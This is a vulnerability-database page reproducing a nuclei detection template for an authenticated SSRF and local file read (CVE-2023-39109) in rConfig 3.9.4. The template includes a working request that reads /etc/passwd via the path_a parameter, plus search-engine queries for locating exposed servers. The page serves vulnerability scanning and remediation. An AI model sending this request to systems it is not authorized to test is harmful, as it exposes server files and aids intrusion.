Lucene search
+L

rConfig 3.9.4 - Server-Side Request Forgery

🗓️ 01 Aug 2026 10:03:16Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 63 Views

rConfig 3.9.4 - Server-Side Request Forgery via path_a parameter in doDiff Functio

Related
Refs
Code
ReporterTitlePublishedViews
Family
attackerkb
ATTACKERKB
CVE-2023-39109
1 Aug 202314:15
attackerkb
circl
Circl
CVE-2023-39109
1 Aug 202318:38
circl
cnnvd
CNNVD
rConfig Code Issue Vulnerability
1 Aug 202300:00
cnnvd
cve
CVE
CVE-2023-39109
1 Aug 202300:00
cve
cvelist
Cvelist
CVE-2023-39109
1 Aug 202300:00
cvelist
nvd
NVD
CVE-2023-39109
1 Aug 202314:15
nvd
osv
OSV
CVE-2023-39109
1 Aug 202314:15
osv
prion
Prion
Server side request forgery (ssrf)
1 Aug 202314:15
prion
redhatcve
RedhatCVE
CVE-2023-39109
23 May 202504:10
redhatcve
vulnrichment
Vulnrichment
CVE-2023-39109
1 Aug 202300:00
vulnrichment
Rows per page
id: CVE-2023-39109

info:
  name: rConfig 3.9.4 - Server-Side Request Forgery
  author: theamanrawat
  severity: high
  description: |
    rconfig v3.9.4 was discovered to contain a Server-Side Request Forgery (SSRF) via the path_a parameter in the doDiff Function of /classes/compareClass.php. This vulnerability allows authenticated attackers to make arbitrary requests via injection of crafted URLs.
  impact: |
    Authenticated attackers can exploit SSRF vulnerabilities in the path_a parameter to make the server fetch arbitrary URLs including local files, potentially accessing sensitive network configuration data and internal services through the rConfig server.
  remediation: |
    Update rConfig to a version newer than 3.9.4 that validates and restricts the path_a parameter to prevent SSRF and local file inclusion attacks.
  reference:
    - https://www.rconfig.com/downloads/rconfig-3.9.4.zip
    - https://github.com/zer0yu/CVE_Request/blob/master/rConfig/rConfig_path_a.md
    - https://nvd.nist.gov/vuln/detail/CVE-2023-39109
    - https://github.com/zer0yu/CVE_Request
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 8.8
    cve-id: CVE-2023-39109
    cwe-id: CWE-918
    epss-score: 0.02965
    epss-percentile: 0.85855
    cpe: cpe:2.3:a:rconfig:rconfig:3.9.4:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 3
    vendor: rconfig
    product: rconfig
    shodan-query:
      - http.title:"rConfig"
      - http.title:"rconfig"
    fofa-query: title="rconfig"
    google-query: intitle:"rconfig"
  tags: cve2023,cve,rconfig,authenticated,ssrf,lfi,vuln

http:
  - raw:
      - |
        GET /login.php HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /lib/crud/userprocess.php HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        user={{username}}&pass={{password}}&sublogin=1
      - |
        GET /lib/crud/configcompare.crud.php?path_a=file:///etc/passwd HTTP/1.1
        Host: {{Hostname}}

    host-redirects: true

    matchers-condition: and
    matchers:
      - type: word
        part: body_1
        words:
          - "rConfig"

      - type: regex
        part: body_3
        regex:
          - "root:.*:0:0:"

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100d6917ce20d2ce6d3423b5f47b8cd9f808c52c96dc9a5cc0b4d79d5392eb1ef52022100c8481e9b5f99414083b6235ff11e80a981f72fdc2dd9fa3279063a6f09c0a316:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 Feb 2026 07:00Current
7.7High risk
Vulners AI Score7.7
CVSS 3.18.8
EPSS0.02965
SSVC
63